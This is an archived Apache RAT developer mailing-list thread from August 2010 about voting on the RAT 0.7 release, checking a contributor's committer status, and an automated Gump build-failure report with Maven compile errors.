Thu, 05 Aug 2010 03:38:54 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=Ft3dRLHmh8e8pugjn9z5EOVj79+U73jOUkd9foS0TdM=; b=RMJU0EpaJhnvnlDha73U+u80TBajdBbEN46a8GP2MbHMRRCKM1RHM6NcaHRCSR4GFG aSnwtqvrn4NPMlGbharfaZN5Z04nR/Ni5/7QMXaiSL0B07phEkgbncozLYJTLYai48ZP QMdj1Jw5X3/27SD7DRZoK0rXj7//c9wtkfz+A= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=kYIIp3O9wRyzksUviQs/sRcAqYyfGc5iLvtVG6A5tsVDTXV/JVWmhBHZ/0DsXGDDVF /AJDkBya8os3lMrHsIXW7uIH5NjD2UFJmLrCGwMJwtmiH+KAVbB+xRfQI48jAGFIZ+HU s5Sy0hM7OR0pyyS5A5vwhzhqqtCaJa4uH/YE8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id 35mr3219415qcf.299.1281004734168; Thu, 05 Aug 2010 03:38:54 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 03:38:54 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Thu, 5 Aug 2010 12:38:54 +0200 Message-ID: <[email protected]> Subject: Re: VOTE: Release Apache RAT 0.7 rc3 From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Is Gav a committer? Otherwise, we are still waiting for the third positive vote? :-( Jochen On Mon, Aug 2, 2010 at 11:18 AM, Gav... <[email protected]> wrote: > > >> -----Original Message----- >> From: Jochen Wiedmann [mailto:[email protected]] >> Sent: Saturday, 31 July 2010 7:23 AM >> To: [email protected] >> Subject: VOTE: Release Apache RAT 0.7 rc3 >> >> Hi, >> >> I'd like to ask for a release of Apache RAT 0.7 rc4. >> >> The distribution files (binary and source) are here: >> >> =C2=A0 https://repository.apache.org/content/repositories/orgapacherat- >> 051/org/apache/rat/apache-rat/0.7/ >> >> The proposed site and the KEYS file are here: >> >> =C2=A0 http://people.apache.org/~jochen/rat/site/ >> =C2=A0 http://people.apache.org/~jochen/rat/KEYS >> >> The SVN tag: >> >> =C2=A0 https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-r= at- >> project-0.7/ >> >> The list of resolved issues is here: >> >> >> https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=3Dtrue&&= p >> id=3D12310750&status=3D5&status=3D6&fixfor=3D12313890&sorter/field=3Diss= uekey&sor >> ter/order=3DDESC >> >> Compared to RC3, the following changes have been made (my thanks to >> Stefan for doing this work): >> >> =C2=A0 - AL header added to download page. >> =C2=A0 - AL header added to src/test/resources/javadocs/notjavadoc.html >> =C2=A0 - Added missing EOL properties >> >> >> Please, cast your vote. >> >> [X] +1 > > Looks good, Built and tested, nice work peeps. > > Gav... > > >> [ ] =3D0 >> [ ] -1 >> >> Thanks, >> >> Jochen > > > --=20 Germanys national anthem is the most boring in the world - how telling! From [email protected] Thu Aug 05 10:53:21 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95015 invoked from network); 5 Aug 2010 10:53:21 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 10:53:21 -0000 Received: (qmail 8688 invoked by uid 500); 5 Aug 2010 10:53:21 -0000 Delivered-To: [email protected] Received: (qmail 8645 invoked by uid 500); 5 Aug 2010 10:53:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8629 invoked by uid 99); 5 Aug 2010 10:53:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:53:19 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO nschwmtas06p.mx.bigpond.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:53:12 +0000 Received: from nschwotgx02p.mx.bigpond.com ([161.129.204.104]) by nschwmtas06p.mx.bigpond.com with ESMTP id <[email protected]> for <[email protected]>; Thu, 5 Aug 2010 10:52:50 +0000 Received: from deltaflyer ([161.129.204.104]) by nschwotgx02p.mx.bigpond.com with ESMTP id <20100805105249.QCDH13035.nschwotgx02p.mx.bigpond.com@deltaflyer> for <[email protected]>; Thu, 5 Aug 2010 10:52:49 +0000 From: "Gav..." <[email protected]> To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Subject: RE: VOTE: Release Apache RAT 0.7 rc3 Date: Thu, 5 Aug 2010 20:52:59 +1000 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: Acs0inhhynoXopjHR9K6y2hC0b0RTgAAcMbQ Content-Language: en-au X-RPD-ScanID: Class unknown; VirusThreatLevel unknown, RefID str=0001.0A090209.4C5A9801.039A,ss=1,fgs=0 X-SIH-MSG-ID: qhgwE939TFelgj0khjaxblklnljh0SNytt9NBYd6+kVFXEfBvd/fS8y9cqBE34/h0S4obl+VTyR3c7zhTY7RuNyyK7lRSrLZ5vg2 > -----Original Message----- > From: Jochen Wiedmann [mailto:[email protected]] > Sent: Thursday, 5 August 2010 8:39 PM > To: [email protected] > Subject: Re: VOTE: Release Apache RAT 0.7 rc3 > > Is Gav a committer? Otherwise, we are still waiting for the third > positive vote? :-( Luckily, I am, not that I've done all that much recently, but my vote does count yes. Gav... > > Jochen > > > On Mon, Aug 2, 2010 at 11:18 AM, Gav... <[email protected]> wrote: > > > > > >> -----Original Message----- > >> From: Jochen Wiedmann [mailto:[email protected]] > >> Sent: Saturday, 31 July 2010 7:23 AM > >> To: [email protected] > >> Subject: VOTE: Release Apache RAT 0.7 rc3 > >> > >> Hi, > >> > >> I'd like to ask for a release of Apache RAT 0.7 rc4. > >> > >> The distribution files (binary and source) are here: > >> > >> https://repository.apache.org/content/repositories/orgapacherat- > >> 051/org/apache/rat/apache-rat/0.7/ > >> > >> The proposed site and the KEYS file are here: > >> > >> http://people.apache.org/~jochen/rat/site/ > >> http://people.apache.org/~jochen/rat/KEYS > >> > >> The SVN tag: > >> > >> https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache- > rat- > >> project-0.7/ > >> > >> The list of resolved issues is here: > >> > >> > >> > https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&&p > >> > id=12310750&status=5&status=6&fixfor=12313890&sorter/field=issuekey&sor > >> ter/order=DESC > >> > >> Compared to RC3, the following changes have been made (my thanks to > >> Stefan for doing this work): > >> > >> - AL header added to download page. > >> - AL header added to src/test/resources/javadocs/notjavadoc.html > >> - Added missing EOL properties > >> > >> > >> Please, cast your vote. > >> > >> [X] +1 > > > > Looks good, Built and tested, nice work peeps. > > > > Gav... > > > > > >> [ ] =0 > >> [ ] -1 > >> > >> Thanks, > >> > >> Jochen > > > > > > > > > > -- > Germanys national anthem is the most boring in the world - how telling! From [email protected] Thu Aug 05 10:54:20 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95216 invoked from network); 5 Aug 2010 10:54:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 10:54:20 -0000 Received: (qmail 11042 invoked by uid 500); 5 Aug 2010 10:54:20 -0000 Delivered-To: [email protected] Received: (qmail 10997 invoked by uid 500); 5 Aug 2010 10:54:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10989 invoked by uid 99); 5 Aug 2010 10:54:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:54:18 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 10:54:09 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1Ogy57-0006VC-3G for [email protected]; Thu, 05 Aug 2010 10:53:49 +0000 Received: from 5e0b6bf8.bb.sky.com ([161.129.204.104] helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1Ogy56-0007rm-SP for [email protected]; Thu, 05 Aug 2010 11:53:49 +0100 Message-ID: <[email protected]> Date: Thu, 05 Aug 2010 11:53:47 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: VOTE: Release Apache RAT 0.7 rc3 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - incubator.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org X-Virus-Checked: Checked by ClamAV on apache.org On 05/08/2010 11:38, Jochen Wiedmann wrote: > Is Gav a committer? Otherwise, we are still waiting for the third > positive vote? :-( I've not had time to test and do due diligence, thus I've not voted (will try but I can't promise I will get the time). I'm happy to vote Gav in as a committer though. Ross > > Jochen > > > On Mon, Aug 2, 2010 at 11:18 AM, Gav...<[email protected]> wrote: >> >> >>> -----Original Message----- >>> From: Jochen Wiedmann [mailto:[email protected]] >>> Sent: Saturday, 31 July 2010 7:23 AM >>> To: [email protected] >>> Subject: VOTE: Release Apache RAT 0.7 rc3 >>> >>> Hi, >>> >>> I'd like to ask for a release of Apache RAT 0.7 rc4. >>> >>> The distribution files (binary and source) are here: >>> >>> https://repository.apache.org/content/repositories/orgapacherat- >>> 051/org/apache/rat/apache-rat/0.7/ >>> >>> The proposed site and the KEYS file are here: >>> >>> http://people.apache.org/~jochen/rat/site/ >>> http://people.apache.org/~jochen/rat/KEYS >>> >>> The SVN tag: >>> >>> https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-rat- >>> project-0.7/ >>> >>> The list of resolved issues is here: >>> >>> >>> https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&&p >>> id=12310750&status=5&status=6&fixfor=12313890&sorter/field=issuekey&sor >>> ter/order=DESC >>> >>> Compared to RC3, the following changes have been made (my thanks to >>> Stefan for doing this work): >>> >>> - AL header added to download page. >>> - AL header added to src/test/resources/javadocs/notjavadoc.html >>> - Added missing EOL properties >>> >>> >>> Please, cast your vote. >>> >>> [X] +1 >> >> Looks good, Built and tested, nice work peeps. >> >> Gav... >> >> >>> [ ] =0 >>> [ ] -1 >>> >>> Thanks, >>> >>> Jochen >> >> >> > > > From [email protected] Thu Aug 05 11:01:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97050 invoked from network); 5 Aug 2010 11:01:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 11:01:36 -0000 Received: (qmail 18813 invoked by uid 500); 5 Aug 2010 11:01:36 -0000 Delivered-To: [email protected] Received: (qmail 18765 invoked by uid 500); 5 Aug 2010 11:01:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18752 invoked by uid 99); 5 Aug 2010 11:01:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:01:34 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO nschwmtas06p.mx.bigpond.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:01:26 +0000 Received: from nschwotgx02p.mx.bigpond.com ([161.129.204.104]) by nschwmtas06p.mx.bigpond.com with ESMTP id <[email protected]> for <[email protected]>; Thu, 5 Aug 2010 11:01:03 +0000 Received: from deltaflyer ([161.129.204.104]) by nschwotgx02p.mx.bigpond.com with ESMTP id <20100805110102.QJKR13035.nschwotgx02p.mx.bigpond.com@deltaflyer> for <[email protected]>; Thu, 5 Aug 2010 11:01:02 +0000 From: "Gav..." <[email protected]> To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Subject: RE: VOTE: Release Apache RAT 0.7 rc3 Date: Thu, 5 Aug 2010 21:01:10 +1000 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: quoted-printable X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: Acs0jI8JwM2Obj6fT9iAlBqjzX5mkQAAFJKg Content-Language: en-au X-RPD-ScanID: Class unknown; VirusThreatLevel unknown, RefID str=0001.0A090205.4C5A99EF.0144,ss=1,fgs=0 X-SIH-MSG-ID: rx87FND9TFelgj0khjaxblklnljh0SNytt9NBYd6+kVFXEfBvd/fS8y9cqBE34/h0S4obl+VTyR3c7zhTY7QuNmxK7xSSrLZ5vg2 X-Virus-Checked: Checked by ClamAV on apache.org > -----Original Message----- > From: Ross Gardler [mailto:[email protected]] > Sent: Thursday, 5 August 2010 8:54 PM > To: [email protected] > Subject: Re: VOTE: Release Apache RAT 0.7 rc3 >=20 > On 05/08/2010 11:38, Jochen Wiedmann wrote: > > Is Gav a committer? Otherwise, we are still waiting for the third > > positive vote? :-( >=20 > I've not had time to test and do due diligence, thus I've not voted > (will try but I can't promise I will get the time). >=20 > I'm happy to vote Gav in as a committer though. I was voted in back in December last year. Note that even if it didn=E2=80=99t count here, you'd go to the IPMC for = more votes and being a member there too I could make it count there also. I have tested the release and am looking forward to implementing some of the newer features to make Buildbot RAT even more useful - like being able to grab RAT XML output reports directly from the projects = themselves without the need for Buildbot to build them first. Will make the RAT=20 Summary table appeal even more. Gav... >=20 > Ross >=20 > > > > Jochen > > > > > > On Mon, Aug 2, 2010 at 11:18 AM, Gav...<[email protected]> > wrote: > >> > >> > >>> -----Original Message----- > >>> From: Jochen Wiedmann [mailto:[email protected]] > >>> Sent: Saturday, 31 July 2010 7:23 AM > >>> To: [email protected] > >>> Subject: VOTE: Release Apache RAT 0.7 rc3 > >>> > >>> Hi, > >>> > >>> I'd like to ask for a release of Apache RAT 0.7 rc4. > >>> > >>> The distribution files (binary and source) are here: > >>> > >>> = https://repository.apache.org/content/repositories/orgapacherat- > >>> 051/org/apache/rat/apache-rat/0.7/ > >>> > >>> The proposed site and the KEYS file are here: > >>> > >>> http://people.apache.org/~jochen/rat/site/ > >>> http://people.apache.org/~jochen/rat/KEYS > >>> > >>> The SVN tag: > >>> > >>> = https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache- > rat- > >>> project-0.7/ > >>> > >>> The list of resolved issues is here: > >>> > >>> > >>> > = https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=3Dtrue&&p= > >>> > = id=3D12310750&status=3D5&status=3D6&fixfor=3D12313890&sorter/field=3Dissu= ekey&sor > >>> ter/order=3DDESC > >>> > >>> Compared to RC3, the following changes have been made (my thanks = to > >>> Stefan for doing this work): > >>> > >>> - AL header added to download page. > >>> - AL header added to = src/test/resources/javadocs/notjavadoc.html > >>> - Added missing EOL properties > >>> > >>> > >>> Please, cast your vote. > >>> > >>> [X] +1 > >> > >> Looks good, Built and tested, nice work peeps. > >> > >> Gav... > >> > >> > >>> [ ] =3D0 > >>> [ ] -1 > >>> > >>> Thanks, > >>> > >>> Jochen > >> > >> > >> > > > > > > From [email protected] Thu Aug 05 11:03:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97627 invoked from network); 5 Aug 2010 11:03:39 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 11:03:39 -0000 Received: (qmail 21163 invoked by uid 500); 5 Aug 2010 11:03:39 -0000 Delivered-To: [email protected] Received: (qmail 21116 invoked by uid 500); 5 Aug 2010 11:03:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21108 invoked by uid 99); 5 Aug 2010 11:03:36 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:03:36 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:03:29 +0000 Received: by qwg8 with SMTP id 8so3957892qwg.6 for <[email protected]>; Thu, 05 Aug 2010 04:03:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=IdnCxYBrREAR0IK80xLUdAdLaXcrrNCzYc8WF/clnEQ=; b=p+yBmjTTBJYp6dlKjLMmWF9pFKePO2xR6Mb+Sj3nXWuMhsjWLArKdz8ZMhGP02Bsyn STbAJSb9V7edHZoe8k3O9B2P6t/JRsFH++UPBQA0Y2vc0mJxTshpCxi/MG7e7yEXFY5w HDaTUWSw22ipA3oHaIIVNQHsWy/OV3sCLvzz0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=jo3nJfVwYQL78/gIyrJi3YDfh8xo9FyhQeG2OwWXSz+ZAhXvFdlc+7q/hWdaZRBASP uUFPJd1o9KebvPFqEYi78dI4yPzShtHTQ7maWCRJFWS02zniZmV12qgq+ee1OrSWp/ba N9XSTIkIK0jhXxKzqAieiCR09d2xRSmYUYVqs= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m1mr4791475qac.353.1281006188079; Thu, 05 Aug 2010 04:03:08 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 04:03:08 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 5 Aug 2010 13:03:08 +0200 Message-ID: <[email protected]> Subject: Re: VOTE: Release Apache RAT 0.7 rc3 From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org On Thu, Aug 5, 2010 at 1:01 PM, Gav... <[email protected]> wrote: > I was voted in back in December last year. Ok, thanks very much, in that case I'll procede to [email protected]. Jochen -- Germanys national anthem is the most boring in the world - how telling! From [email protected] Thu Aug 05 11:06:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2402 invoked from network); 5 Aug 2010 11:06:22 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 11:06:22 -0000 Received: (qmail 22786 invoked by uid 500); 5 Aug 2010 11:06:22 -0000 Delivered-To: [email protected] Received: (qmail 22724 invoked by uid 500); 5 Aug 2010 11:06:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22701 invoked by uid 99); 5 Aug 2010 11:06:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:06:19 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 11:06:12 +0000 Received: by qwg8 with SMTP id 8so3959805qwg.6 for <multiple recipients>; Thu, 05 Aug 2010 04:05:51 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=cjAQZ4hJpzbosiTFtvhfEFHZJg8NvaHYktsSleu+pJM=; b=OCOeaCNbdwGn6LCZBERVF5WNuwOh8xXcl3BCfANSVCONGaicLoAknT7yQxWJtnfkrS nXPrJjxYLUXxRCYmsJe3lbp6hvFexN/uQMQz6owZsLEnOEz0FmwWmzBMcytNSS+0S4la Vx17NBBE3JaxNmAgEo2dzCeKymoN1l30j7iU0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=xN4lNi+mte0TIQlyL1+MNC6cl39N49jhlejoMoFm1C0CGLjc5wwVbwQG0MTNbd/7C/ um/Zq6v56EE5sYN/30O+yuIoKU5hfBqvV+xblF0HSIRsR69gVwewMoldi0cAeQI9rHnu ne0SKHBtcooTKZvMuxw24Y5TpD/5BhlUy786s= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m1mr4794339qac.353.1281006351371; Thu, 05 Aug 2010 04:05:51 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 5 Aug 2010 04:05:51 -0700 (PDT) Date: Thu, 5 Aug 2010 13:05:51 +0200 Message-ID: <[email protected]> Subject: VOTE: Release Apache RAT 0.7 From: Jochen Wiedmann <[email protected]> To: general-incubator <[email protected]>, [email protected] Content-Type: text/plain; charset=UTF-8 X-Virus-Checked: Checked by ClamAV on apache.org Hi, the RAT developer team would like your approvement for a release of Apache RAT 0.7. The distribution files (binary and source) are here: https://repository.apache.org/content/repositories/orgapacherat-051/org/apache/rat/apache-rat/0.7/ The proposed site and the KEYS file are here: http://people.apache.org/~jochen/rat/site/ http://people.apache.org/~jochen/rat/KEYS The SVN tag: https://svn.apache.org/repos/asf/incubator/rat/main/tags/apache-rat-project-0.7/ The list of resolved issues is here: https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&&pid=12310750&status=5&status=6&fixfor=12313890&sorter/field=issuekey&sorter/order=DESC Please, cast your vote. [ ] +1 [ ] =0 [ ] -1 Thanks, Jochen From [email protected] Thu Aug 05 13:45:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69457 invoked from network); 5 Aug 2010 13:45:56 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Aug 2010 13:45:56 -0000 Received: (qmail 68695 invoked by uid 500); 5 Aug 2010 13:45:55 -0000 Delivered-To: [email protected] Received: (qmail 68633 invoked by uid 500); 5 Aug 2010 13:45:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68624 invoked by uid 99); 5 Aug 2010 13:45:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 13:45:52 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO vmgump.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Aug 2010 13:45:51 +0000 Received: from [161.129.204.104] (localhost [161.129.204.104]) by vmgump.apache.org (Postfix) with ESMTP id ADF12AB419F for <[email protected]>; Thu, 5 Aug 2010 06:45:31 -0700 (PDT) Date: Thu, 05 Aug 2010 06:45:31 PDT From: [email protected] To: [email protected] Subject: [GUMP@vmgump]: Project rat (in module rat) failed Message-Id: <[email protected]> To whom it may engage... This is an automated request, but not an unsolicited one. For more information please visit http://gump.apache.org/nagged.html, and/or contact the folk at [email protected]. Project rat has an issue affecting its community integration. This issue affects 4 projects. The current state of this project is 'Failed', with reason 'Build Failed'. For reference only, the following projects are affected by this: - forrest-rat : Apache Forrest software is a publishing framework that trans... - rat : Release Audit Tool - rat-tasks-antunit-tests : Release Audit Tool - rat-test : Release Audit Tool Full details are available at: http://vmgump.apache.org/gump/public/rat/rat/index.html That said, some information snippets are provided here. The following annotations (debug/informational/warning/error messages) were provided: -INFO- Optional dependency ws-commons-axiom failed with reason build failed -DEBUG- (Gump generated) Maven2 Settings in: /srv/gump/public/workspace/rat/gump_mvn_settings.xml -INFO- Failed with reason build failed -DEBUG- Maven POM in: /srv/gump/public/workspace/rat/pom.xml -INFO- Failed to extract fallback artifacts from Gump Repository The following work was performed: http://vmgump.apache.org/gump/public/rat/rat/gump_work/build_rat_rat.html Work Name: build_rat_rat (Type: Build) Work ended in a state of : Failed Elapsed: 43 secs Command Line: mvn --batch-mode -Dmaven.test.skip.exec=true --settings /srv/gump/public/workspace/rat/gump_mvn_settings.xml package [Working Directory: /srv/gump/public/workspace/rat] --------------------------------------------- [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); [ERROR] /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[285,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found sink.head(); [INFO] 5 errors [INFO] ------------------------------------------------------------- [INFO] ------------------------------------------------------------------------ [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] Compilation failure /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[42,60] package org.apache.maven.doxia.module.xhtml.decoration.render does not exist /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,12] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[215,43] cannot find symbol symbol : class RenderingContext location: class org.apache.rat.mp.RatReportMojo /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[217,36] cannot access org.apache.maven.doxia.module.xhtml.XhtmlSink class file for org.apache.maven.doxia.module.xhtml.XhtmlSink not found SiteRendererSink sink = new SiteRendererSink( context ); /srv/gump/public/workspace/rat/apache-rat-plugin/src/main/java/org/apache/rat/mp/RatReportMojo.java:[285,12] cannot access org.apache.maven.doxia.logging.LogEnabled class file for org.apache.maven.doxia.logging.LogEnabled not found sink.head(); [INFO] ------------------------------------------------------------------------ [INFO] For more information, run Maven with the -e switch [INFO] ------------------------------------------------------------------------ [INFO] Total time: 41 seconds [INFO] Finished at: Thu 